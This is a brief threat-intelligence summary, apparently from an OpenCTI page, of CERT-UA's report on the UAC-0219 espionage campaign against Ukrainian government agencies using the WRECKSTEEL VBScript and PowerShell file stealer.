Cyber Espionage using PowerShell stealer WRECKSTEEL

SUMMARY :

Ukrainian government's CERT-UA has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, utilize compromised accounts to distribute emails with links to public file services. These links download a VBScript loader, which then launches a PowerShell script to search and upload specific file types using cURL. The malicious activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files created with NSIS installers, containing decoy documents and the IrfanView program for screenshots. CERT-UA urges immediate reporting of any detected cyberattack signs.

OPENCTI LABELS :

powershell,ukraine,critical infrastructure,vbscript,cyber espionage,government,file stealing,wrecksteel


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Cyber Espionage using PowerShell stealer WRECKSTEEL